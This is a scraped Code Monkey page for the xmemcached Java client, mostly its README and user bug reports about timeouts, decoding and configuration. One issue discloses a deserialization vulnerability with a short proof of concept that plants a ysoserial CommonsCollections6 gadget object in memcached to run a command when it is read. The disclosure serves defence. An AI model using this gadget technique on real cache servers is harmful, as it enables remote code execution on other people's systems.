Code Monkey home page Code Monkey logo

xmemcached's Introduction

Build Status

News

  • 2.4.8 released, some minor fixes.
  • 2.4.7 released, supports MemcachedSessionComparator and resolveInetAddresses settings and tweak benchmark projects.
  • 2.4.6 released, set timeoutExceptionThreshold though XMemcachedClientFactoryBean.

Introduction

XMemcached is a high performance, easy to use blocking multithreaded memcached client in java.

It's nio based and was carefully turned to get top performance.

Quick start:

Contribute

Fork the source code and checkout it to your local machine. Make changes and create a pull request.

Use docker and docker-compose to setup test environment:

$ cd xmemcached
$ docker-compose up -d

Run unit tests:

$ mvn test

Run integration test:

$ mvn integration-test

Thanks to all contributors, you make xmemcached better.

Contributors

License

Apache License Version 2.0

xmemcached's People

Contributors

ayman-abdelghany avatar bmahe avatar bmahe-tango avatar chenzhang22 avatar docdoc avatar hxy1991 avatar jlleitschuh avatar killme2008 avatar liuzheqiang avatar markrmullan avatar mirlord avatar profondometer avatar raiv avatar saschat avatar spudone avatar tomjiang1987 avatar wolfg1969 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

xmemcached's Issues

java.util.concurrent.TimeoutException

We are seeing bursts of this exception in production for various memcache operations. Stack traces look similar to this:

java.util.concurrent.TimeoutException: Timed out(5000 milliseconds) waiting for operation while connected to 127.0.0.1:11211
    at net.rubyeye.xmemcached.XMemcachedClient.latchWait(XMemcachedClient.java:2536)
    at net.rubyeye.xmemcached.XMemcachedClient.sendStoreCommand(XMemcachedClient.java:2498)
    at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1338)
    at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1408)

We could not 100% pin point what is causing it but one of the suspects is how XMemcached handles server responses.

One situation that can be reproduced in a standalone java project is how XMemcached client handles server responses for values greater than 1M (> default max size in memcache).

In the code below our expectation is to get MemcachedServerException with message "object too large for cache" for "set" operation but instead we are getting java.util.concurrent.TimeoutException

It is worth noting that spymemcached client used in the same code does handle server response properly and returns "SERVER_ERROR object too large for cache"

import net.rubyeye.xmemcached.MemcachedClient;
import net.rubyeye.xmemcached.XMemcachedClientBuilder;
import net.rubyeye.xmemcached.transcoders.SerializingTranscoder;
import net.rubyeye.xmemcached.utils.AddrUtil;

import java.io.IOException;
import java.util.Arrays;

public class LargeObjectsWithXMemcachedClient {

    private static final String KEY_LARGE_OBJECT = "largeObject";

    public static void main(String[] args) throws IOException {
        int megabyte_plus1 = 1048577; //1024 * 1024 + 1

        System.out.println("Building xmemcached client");

        XMemcachedClientBuilder builder = new XMemcachedClientBuilder(AddrUtil.getAddresses("localhost:11211"));
        MemcachedClient client = builder.build();

        // making sure that payload does not get compressed and client does not throw exception on max size limit
        // so that large value gets sent to memcached server. We expect xmemcached client to
        // throw MemcachedServerException with message "object too large for cache"
        SerializingTranscoder transcoder = new SerializingTranscoder(megabyte_plus1 * 2); // something bigger than memcached daemon max value size.
        transcoder.setCompressionThreshold(transcoder.getMaxSize()); // bumping up compression threshold so that xmemcached client does not compress.

        try {
            String largeObject = createString(megabyte_plus1);

            System.out.println("set " + KEY_LARGE_OBJECT);
            client.set(KEY_LARGE_OBJECT, 60, largeObject, transcoder);

            String readLargeObject = client.get(KEY_LARGE_OBJECT);
            System.out.println("get " + KEY_LARGE_OBJECT + ": " + (readLargeObject == null ? "does not exist in cache" : "size() = " + readLargeObject.length()));

            System.out.println("done");
        } catch (Exception exception) {
          exception.printStackTrace();
        } finally {
            System.out.println("shutting down memcached client");
            client.shutdown();
        }
    }

    private static String createString(int size) {
        char[] chars = new char[size];
        Arrays.fill(chars, 'f');
        return new String(chars);
    }
}

some error when to visit kestrel

Test code

XMemcachedClientBuilder builder = new XMemcachedClientBuilder(AddrUtil.getAddresses(hosts));
builder.getConfiguration().setSessionIdleTimeout(10000);
builder.setCommandFactory(new KestrelCommandFactory());
memcachedClient=builder.build();
memcachedClient.setPrimitiveAsString(true);
memcachedClient.setOptimizeGet(false);
memcachedClient.setOpTimeout(10000);

for(int i=0;i<1;i++){
new Thread(new Runnable() {
@OverRide
public void run() {
//To change body of implemented methods use File | Settings | File Templates.
memcachedClient.get("aaa/t=2000");

            }
        }).start();
    }
    for(int i=0;i<1;i++){
        new Thread(new Runnable() {
            @Override
            public void run() {
                //To change body of implemented methods use File | Settings | File Templates.
                memcachedClient.set("aaab", "asdf");

            }
        }).start();
    }

net.rubyeye.xmemcached.exception.MemcachedDecodeException: Decode error,session will be closed,line=STORED
at net.rubyeye.xmemcached.command.Command.decodeError(Command.java:259)
at net.rubyeye.xmemcached.command.Command.decodeError(Command.java:270)
at net.rubyeye.xmemcached.command.text.TextGetCommand.decode(TextGetCommand.java:126)
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode0(MemcachedDecoder.java:61)
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode(MemcachedDecoder.java:56)
at com.google.code.yanf4j.nio.impl.NioTCPSession.decode(NioTCPSession.java:288)
at com.google.code.yanf4j.nio.impl.NioTCPSession.readFromBuffer(NioTCPSession.java:205)
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onRead(AbstractNioSession.java:198)
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onEvent(AbstractNioSession.java:343)
at com.google.code.yanf4j.nio.impl.SocketChannelController.dispatchReadEvent(SocketChannelController.java:56)
at com.google.code.yanf4j.nio.impl.NioController.onRead(NioController.java:157)
at com.google.code.yanf4j.nio.impl.Reactor.dispatchEvent(Reactor.java:294)
at com.google.code.yanf4j.nio.impl.Reactor.run(Reactor.java:141)

but when replace memcachedClient.get("aaa/t=2000"); to memcachedClient.get("aaa"); is ok

I read the source code, i found there is only one session bind to one channel ,the command put to queue ,then sent one by one , but in the first case , getting without response is blocked, setting come back , then fetch the first executing command that is getting ,but response is STORED,so occur error,

This will depend to return the order, but the server can not guarantee first come, first response.

can you explain why to design like that.

Caught IOException decoding bytes of data due to StreamCorruptedException: invalid stream header

we are only putting, getting a large String value.

ERROR net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder - Caught IOException decoding 5318 bytes of data
java.io.StreamCorruptedException: invalid stream header: 613A333A
at java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:800)
at java.io.ObjectInputStream.(ObjectInputStream.java:297)
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder$1.(BaseSerializingTranscoder.java:95)
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.deserialize(BaseSerializingTranscoder.java:95)
at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode0(SerializingTranscoder.java:92)
at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode(SerializingTranscoder.java:86)
at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:657)
at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1058)
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1016)
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1027)
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1049)
at com.google.code.ssm.providers.xmemcached.MemcacheClientWrapper.get(MemcacheClientWrapper.java:133)
at com.google.code.ssm.CacheImpl.get(CacheImpl.java:256)
at com.google.code.ssm.CacheImpl.get(CacheImpl.java:101)
at com.google.code.ssm.spring.SSMCache.get(SSMCache.java:82)

XMemcachedClientFactoryBean still uses deprecated BufferAllocator without alternative

XMemcachedClientFactoryBean makes use of the deprecated BufferAllocator which itself uses the deprecated IoBuffer, all of which are defined within this package. No solutions or newer versions are stipulated in the deprecation comments.

Please enrich the comments to help API consumers understand the desired alternatives to BufferAllocator, SimpleBufferAllocator, IoBuffer and CachedBufferAllocator. Thanks.

求教cas操作的行为

版本是2.0版本
cas操作在更新memcached中 不存在 的key时,行为是怎样的?

目前我自己测试,如果net.rubyeye.xmemcached.XMemcachedClient#cas(java.lang.String, int, java.lang.Object, long)这个方法,第4个写0的话,会插入新的key-value。如果第4个cas这个值写的不是0,就不会插入新key-value。请问这是怎么回事?

我使用telnet直接连接memcached时,试图重现,但是无论cas的值我写的是不是0,对方都会返回NOT_FOUND,而不是在0的时候插入成功。

client行为和命令行直接用telnet行为似乎不一致?是bug还是额外的特性?

java 和php共用memcache,hash算法一直不一致

PHP采用如下方式:

$mem->setOption(Memcached::OPT_DISTRIBUTION,Memcached::DISTRIBUTION_CONSISTENT);
$mem->setOption(Memcached::OPT_LIBKETAMA_COMPATIBLE,true);

java:
builder.setSessionLocator(new KetamaMemcachedSessionLocator());

php使用memcached扩展,开始使用默认设置,不一致,后来改用KETAMA,还是不行

XMemcached pooled client Recv Q size is very high

Hi,

We've been using XMemcachedClient connected to twemproxy which sits behind set of memcached servers. We've kept a OpTimeout of 30 ms.

Over the time, the Recv Q(from netstat) size of the tcp socket grows really high and prompting timeouts from XMemcached. Twemproxy as a result is also getting killed by going OOM gradually

Is XMemcached client slow in receiving data? Should TCP_RECV_BUFF_SIZE be increased?

Few more details:

  1. XMemcached version: 2.4.0
  2. Protocol: Text Protocol
  3. Session Idle Timeout: 60 secs
  4. timeoutExceptionThreshold: 250000
  5. healSessionInterval: 1 sec
  6. Pool Size: 20
  7. Throughput: ~ 2.2K QPS

Initialization information from the client as warnings

When I start the application I get the following information as WARN's. Was not supposed be INFO's?

WARN net.rubyeye.xmemcached.XMemcachedClient - XMemcachedClient is using Binary protocol
WARN c.google.code.yanf4j.core.impl.AbstractController - The Controller started at localhost/127.0.0.1:0 ...
WARN c.google.code.yanf4j.core.impl.AbstractController - Add a session: 127.0.0.1:11211

Thanks,
estefanog

Disable log4j logging?

This might be a silly question but how do I stop xmemcached from logging output when log4j is configured for DEBUG:

log4j.rootLogger = DEBUG, CONSOLE, LOGFILE

I don't want to see xmemcached's DEBUG logging when I'm debugging my application.

Thanks

Advice: add more comment to source code

Hi, I'm using xmemcached all the time.

Your source code is well written and I've learned so much.

It's very kind of you if you would add more comment to the source code.

Thanks very much.

unable to GET value from memcached which is set by C# client

Hi,

I encountered an weird issue that Xmemcached client is not able to get value (String) from memcached which is set by C# Enyim client. However, the value can be access and read from terminal telnet, Python memcache client. Please let me know if you have any suggestions to solve this problem. Thanks!

2018-01-11 11:08:06.655 [ERROR] [main] BaseSerializingTranscoder: Failed to decompress data
java.util.zip.ZipException: Not in GZIP format
at java.util.zip.GZIPInputStream.readHeader(GZIPInputStream.java:165) ~[?:1.8.0_144]
at java.util.zip.GZIPInputStream.(GZIPInputStream.java:79) ~[?:1.8.0_144]
at java.util.zip.GZIPInputStream.(GZIPInputStream.java:91) ~[?:1.8.0_144]
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.gzipDecompress(BaseSerializingTranscoder.java:274) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.decompress(BaseSerializingTranscoder.java:219) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode(SerializingTranscoder.java:87) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:657) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1085) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1043) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1065) [xmemcached-2.4.0.jar:?]

Got Incr/Decr on non-numeric value exception

I'm using SerializingTranscoder,when set primitiveAsString = false by default it's got exception : Incr/Decr on non-numeric value. For example : memcachedClient.set("inventory", 0, 100); the real value to be set is 'd' (ascll('d') = 100);
when set primitiveAsString = true,the correct value to be store in memcached and can be incr or decr。

Support for AWS Elasticache Autodiscovery

Request to add support for AWS Autodiscovery to xmemcached
http://docs.aws.amazon.com/AmazonElastiCache/latest/UserGuide/AutoDiscovery.html

Amazon forked the spy client to provide and implementation of this functionality
awslabs/aws-elasticache-cluster-client-memcached-for-java@70bf764

But we have had recurring problems with Spy client and much prefer xmemcached

Only problem with xmemcached is that there is no builtin recovery mechanism if a node is replaced after the client has initialized. A new node will have the same URL but different IP address.

Any interest?

using one MemcachedClient per node in the cluster

I am using AWS clusters, but doing so in an unusual way. For my needs, scaling up and down is far burstier than most. That is, I go from 2 nodes to 8 or 8 nodes to 2. Therefore, consistent hashing doesn't help much. So what I want to do is on each of my java client machines that talk to the cluster, have one of your MemcachedClient classes for each node. Then there is no need for consistent hashing. What I am doing is this: when I scale up from 2 nodes to 8, I record that now the primary nodecount is 8 and the secondary node count is 2. When I do a get(), I first use my own murmur3 hash of the nodecount modules 8 to select the appropriate MemcachedClient to use, and if that fails, then my getter tries getting from nodecount modulus 2, and if found, adds it to the new primary node. Thus instead of consistent hashing, I pay the cost of 2 gets and a possible migration when the mapping is on the wrong node due to scale up.

The question to you is does your nio-based library handle the construction of many MemcachedClient objects, one per node, in a performant way, or did you design it to only work well with one MemcachedClient object for the entire cluster?

Exception trace output from BaseSerializingTranscoder if Objects no more compatible

If a retrieved object from cache is no more "compatible" with the current class in the running application, memcachedClient.get(..) does correctly return null but also prints an exeption trace like:

10:19:48,504 ERROR [net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder] (default task-110) Caught IOException decoding 8002 bytes of data: java.io.InvalidClassException: com.my.package.my.class; local class incompatible: stream classdesc serialVersionUID = 7737855311941045290, local class serialVersionUID = -351616861165941259
	at java.io.ObjectStreamClass.initNonProxy(ObjectStreamClass.java:616)
	at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1630)
	at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1781)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	at java.util.ArrayList.readObject(ArrayList.java:791)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.deserialize(BaseSerializingTranscoder.java:112)
	at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode0(SerializingTranscoder.java:98)
	at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode(SerializingTranscoder.java:90)
	at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:669)
	at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1072)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1030)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1041)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1063)
	at xx.xx.CacheService.cacheGet(CacheService.java:1052)

There is no exception thrown to my code so that I could catch it around memcachedClient.get(..). This output comes from the client itself.
How can I disable this?

I already have the following in my log4j.xml Configuration:

<Configuration >
    <Properties>
        <Property name="log4j.logger.net.rubyeye.xmemcached">false</Property>
        <Property name="log4j.logger.com.google.code.yanf4j">false</Property>
    </Properties>
...
</Configuration>

Edit: fixed styling.

does xmemcached framework thread safe?

recently, I am using xmemcached with mina to develop multithreading projects including many clients and many servers. I really want to know does xmemcached thread safe. should I create one instance for each of the client? thank you for your time.

XMemcached network layou t exception

Help ~~
My xmemcached ver is 1.3.5.
I got this error msg:
2016-02-11 06:31:59,912 [xmemcached-read-thread-1-thread-4] ERROR n.r.xmemcached.impl.MemcachedHandler 111 - XMemcached network layou
t exception
java.lang.OutOfMemoryError: Java heap space
at java.lang.String.substring(String.java:1939) ~[na:1.6.0_45]
at java.lang.String.subSequence(String.java:1972) ~[na:1.6.0_45]
at java.util.regex.Pattern.split(Pattern.java:1002) ~[na:1.6.0_45]
at java.lang.String.split(String.java:2292) ~[na:1.6.0_45]
at java.lang.String.split(String.java:2334) ~[na:1.6.0_45]
at net.rubyeye.xmemcached.command.text.TextVersionCommand.decode(TextVersionCommand.java:66) ~[xmemcached-1.3.5.jar:na]
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode0(MemcachedDecoder.java:61) ~[xmemcached-1.3.5.jar:na]
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode(MemcachedDecoder.java:56) ~[xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.NioTCPSession.decode(NioTCPSession.java:288) ~[xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.NioTCPSession.readFromBuffer(NioTCPSession.java:205) ~[xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onRead(AbstractNioSession.java:198) [xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onEvent(AbstractNioSession.java:343) [xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.SocketChannelController.dispatchReadEvent(SocketChannelController.java:56) [xmemcached-1.3
.5.jar:na]
at com.google.code.yanf4j.nio.impl.NioController$ReadTask.run(NioController.java:110) [xmemcached-1.3.5.jar:na]
at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:895) [na:1.6.0_45]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:918) [na:1.6.0_45]
at java.lang.Thread.run(Thread.java:662) [na:1.6.0_45]

NIO Connection Pooling - synchronzation

In the Wiki, there is written

XMemcached is base on java NIO, it has one connection to one Memcached server by default, it is very excellent in most projects. But in some typical high-concurrent enviornment, it will has bottleneck too. So Xmemcached support NIO connection pool, it can create multiple connections to one Memcached server. But you should know, they are not synchronized, so you must make sure the synchronzation of data update. You can enable connection pool with following code:

I do not understand this: ...But you should know, they are not synchronized, so you must make sure the synchronzation of data update...
In which situation is a synchronisation needed and why?
Thank you for your help!

Make shutdown hook configurable

In our server, we register a shutdown hook to cleanly shut the server down. We have some high priority tasks that rely on getting a few last things written to memcache. However, with XMemcached, that fails, because its own shutdown hook executes first, killing the connection.

Could we make whether XMemcached uses a shutdown hook configurable (default on)? In our server, we'd turn it off and use our own hook to call .shutdown() on the client.

Session(127.0.0.1:11211) has been closed

最近使用老是报这个错,一样的程序在其他2台服务器正常,关键是出问题的服务器启动的时候,有的set是成功的,有的set报这个错,找不到啥原因了。
lt :true -- com.ydqt.pay.common.cache.CacheManager.doAccessCheck(CacheManager.java:165)
net.rubyeye.xmemcached.exception.MemcachedException: Session(127.0.0.1:11211) has been closed
at net.rubyeye.xmemcached.impl.MemcachedConnector.send(MemcachedConnector.java:506)
at net.rubyeye.xmemcached.XMemcachedClient.sendCommand(XMemcachedClient.java:315)
at net.rubyeye.xmemcached.XMemcachedClient.sendStoreCommand(XMemcachedClient.java:2496)
at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1338)
at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1396)
at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1383)
at com.ydqt.pay.common.cache.XmemcachedUtil.set(XmemcachedUtil.java:90)
at com.ydqt.pay.common.cache.CacheManager.doAccessCheck(CacheManager.java:164)
at sun.reflect.GeneratedMethodAccessor81.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621)
at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:610)
at org.springframework.aop.aspectj.AspectJAroundAdvice.invoke(AspectJAroundAdvice.java:65)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:90)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202)
at $Proxy39.loadUserTotalMonthLimitInfo(Unknown Source)
at com.ydqt.pay.core.job.CacheJob.work_UserTotalMonthLimit(CacheJob.java:163)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:64)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:53)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:441)
at java.util.concurrent.FutureTask$Sync.innerRunAndReset(FutureTask.java:317)
at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:150)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$101(ScheduledThreadPoolExecutor.java:98)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.runPeriodic(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:204)
at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:886)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:908)
at java.lang.Thread.run(Thread.java:662)
2015-06-24 11:31:47 INFO put key: {api_CacheServiceImpl_loadUserTotalMonthLimitInfo_-530343884},obj: {{460036130191220=999999900, 460078116640833=999996500}},result :false -- com.ydqt.pay.common.cache.CacheManager.doAccessCheck(CacheManager.java:165)
2015-06-24 11:31:47 INFO put key: {api_CacheServiceImpl_loadAisleMonthLimitInfo_-422391745},obj: {{1=96600}},result :true

上面一条是报错的,但下面一条又正常了。。。

是否考虑支持springboot

spring boot 这种开发理念越来越受到欢迎,基本很少的配置就可以使用各种组合,是否也会考虑支持。

DNS changes requires reinstantiating xmemcached client

If a memcached server is restarted and gets a different IP address when recovering, the xmemcached client will never notice of that (as the name is resolved by the builder constructor):

    public XMemcachedClientBuilder(String addressList) {
        this(AddrUtil.getAddresses(addressList));
    }

This is a very serious limitation in many dynamic envs (eg: AWS).

ttl setting ?

Is there a ttl setting to disconnect conntection in pool after a specific time?

There is no available connection at this moment

xmemcache:2.0.0
memcached:
STAT pid 20283
STAT uptime 9276
STAT time 1516169080
STAT version 1.4.4
STAT pointer_size 64
STAT rusage_user 0.136979
STAT rusage_system 0.089986
STAT curr_connections 9
STAT total_connections 16
STAT connection_structures 11
STAT cmd_get 57
STAT cmd_set 524
STAT cmd_flush 0
STAT get_hits 2
STAT get_misses 55

但是某次发布后大量抛出异常
image

 <bean name="memcachedClientBuilder" class="net.rubyeye.xmemcached.XMemcachedClientBuilder">
        <!-- XMemcachedClientBuilder have two arguments.First is server list,and second is weights array. -->
        <constructor-arg>
            <list>
                <bean class="java.net.InetSocketAddress">
                    <constructor-arg value="xxx"/>
                    <constructor-arg value="11511"/>
                </bean>
            </list>
        </constructor-arg>
        <property name="connectionPoolSize" value="2"/>
        <property name="commandFactory">
            <bean class="net.rubyeye.xmemcached.command.TextCommandFactory"/>
        </property>
        <property name="sessionLocator">
            <bean class="net.rubyeye.xmemcached.impl.KetamaMemcachedSessionLocator"/>
        </property>
        <property name="transcoder">
            <bean class="net.rubyeye.xmemcached.transcoders.SerializingTranscoder"/>
        </property>
    </bean>
    <bean name="memcachedClient" factory-bean="memcachedClientBuilder"
          factory-method="build" destroy-method="shutdown"/>

怀疑是某种情形下session不会再次创建
目前重新启动了项目可以正常使用

Diffrent namespace may has the same timestamp

XMemcachedClient.getNamespace use timestamp for namespace identify.However, the timestamp may be same when server start with a clean memcached.
This has happend on our product servers, cause xmemcached get wrong values of other namespace.

[security] XMemcached deserialization vulnerability

XMemcached support a series of transcoder, And they all have decode method to implement get different types of cache data. But the SerializingTranscoder using the deserialize method, And deserialize of BaseSerializingTranscoder using the ObjectInputStream#readObject. So if the cache data is a evil object, When Client attempt to get the value , It can be execute arbitrary java code.
PoC:

import ysoserial.payloads.CommonsCollections6;
....//host, user, password define
Object evilObject = new CommonsCollections6().getObject("touch /tmp/vultest");
MemcachedClient cache = null;
cache = new MemcachedClient(new ConnectionFactoryBuilder().setProtocol(Protocol.BINARY).setAuthDescriptor(ad).build(),
                                AddrUtil.getAddresses(host + ":" + port));
OperationFuture<Boolean> future = cache.set("testKey", expireTime, evilObject);
future.get();
cache.get("testKey");

In many cloud service scenario, They provide the NoSQL manage service online, if they use SerializingTranscoder, It will be dangerous

Heal-Session-Thread stops if UnresolvedAddressException occurs

If a network issue occurs and hostnames cannot be resolved, then the SessionMonitor throws an exception (in rescheduleConnectRequest in the log line) and so the thread stops.
After that the XMemcachedClient becomes unusable an never re-connects.

Exception in thread "Heal-Session-Thread" java.lang.NullPointerException at net.rubyeye.xmemcached.impl.MemcachedConnector$SessionMonitor.rescheduleConnectRequest(MemcachedConnector.java:166) at net.rubyeye.xmemcached.impl.MemcachedConnector$SessionMonitor.run(MemcachedConnector.java:152)
After earlier exception
[13:43:40,544][] [ERROR]xmemcached.impl.MemcachedConnector$SessionMonitor:151 - SessionMonitor connect error java.nio.channels.UnresolvedAddressException at sun.nio.ch.Net.checkAddress(Net.java:123) at sun.nio.ch.SocketChannelImpl.connect(SocketChannelImpl.java:622) at net.rubyeye.xmemcached.impl.MemcachedConnector.connect(MemcachedConnector.java:468) at net.rubyeye.xmemcached.impl.MemcachedConnector$SessionMonitor.run(MemcachedConnector.java:118)

With the code
log.error("Reconnect to " + address.getAddress().getHostAddress() + ":" + address.getPort() + " fail");
Because address.getAddress() returns null as host not resolvable.

java.util.concurrent.TimeoutException even though memcached server almost unloaded

I observe sometimes such exceptions:

07:58:26,346 ERROR [stderr] (default task-35) java.util.concurrent.TimeoutException: Timed out(5000 milliseconds) waiting for operation while connected to xxx:11211
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.latchWait(XMemcachedClient.java:2572)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:644)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1085)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1043)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1054)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1076)

This is strange, because the server has CPU usage below 1%. So I wonder, if I do something wrong with the instatiation of xmemcached client. I use it in a Java EE environment. I created a @Singleton, which will build the client on @PostConstruct; since xmemcached client should be thread safe, I also annotated @ConcurrencyManagement(ConcurrencyManagementType.BEAN) on the singleton. So the whole code looks like:

@Singleton
@Startup
@ConcurrencyManagement(ConcurrencyManagementType.BEAN)
public class CacheService
{

	private MemcachedClient memcachedClient;

	@PostConstruct
	private void connect()
	{
		MemcachedClientBuilder builder = new XMemcachedClientBuilder(AddrUtil.getAddresses(host));
		builder.setCommandFactory(new BinaryCommandFactory());
		memcachedClient = builder.build();
	}

	public <T> T cacheGet(String key)
	{
		result = return (T) memcachedClient.get(key);
	}
	
	...
